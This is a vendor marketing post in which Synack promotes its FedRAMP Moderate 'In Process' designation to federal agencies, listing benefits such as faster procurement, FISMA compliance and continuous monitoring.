Organizations spend on average $1.3M per year on erroneous or inaccurate alerts, and sadly, while the average company gets 1 million alerts per year, only 4% are ever investigated. During a time when attacks are at an all-time high, it’s more important than ever to have security protections in place with results you can trust. Synack’s new FedRAMP Moderate “In Process” designation underlines the company’s commitment to providing a high level of security across the board and quality results, speeding vulnerability management efforts and reducing risks to government assets.
The 5 Benefits of Synack FedRAMP for Federal Agencies
Through partnering with Synack and leveraging Synack’s FedRAMP Moderate “In Process” designation, agencies can be reassured that their data is in safe hands. Synack will now provide the following benefits to federal agencies:
Easy and quick procurement: Saves agencies time, 30 percent or more of costs, and effort by allowing them to leverage the existing assessments and authorization under FedRAMP.
Risk mitigation: A security assessment at the Moderate level contains 3x the security controls in an ISO 27001 certification. These protections provide assurance that Synack is handling your data and the pentesting process with extra care.
FISMA compliance: Agencies are required to maintain FISMA compliance and FedRAMP provides a more affordable path to FISMA compliance. Many of the NIST 800-53 controls in FedRAMP overlap with those in FISMA, which means you don’t have to spend extra resources implementing these controls with vendors during an annual audit.
Data security: Unlike FedRAMP LI-SaaS, FedRAMP Moderate is designed for agencies handling both external and internal applications. Additionally, if an agency works with sensitive data, they should be working with providers at the Moderate level.
Continuous monitoring: In order to comply with FedRAMP, agencies and software providers must continuously monitor certain controls and go through an annual assessment, which ensures they are always working with a fully-compliant testing provider.
Why the FedRAMP Designation Matters
Synack is the only crowdsourced security company that has achieved the “In Process” status at the Moderate level. FedRAMP levels vary across the number of controls required, the sensitivity of the information, and the network access for government applications. Cloud service providers (CSPs) are granted authorizations at four impact levels: LI-SaaS (Low Impact Software-as-a-Service), Low, Moderate and High.
The stark difference in the control required is particularly apparent when you compare each of the 17 NIST 800-53 control families side by side. There are drastically more requirements for certain control families like access control, identification and authentication, and system and information integrity. These additional controls that Synack is adhering to ensure that your government assets—whether external or internal—stay secure.
If you’d like to learn more about Synack’s FedRAMP environment or solutions for your Federal SOC, click here to book a meeting with a Synack representative.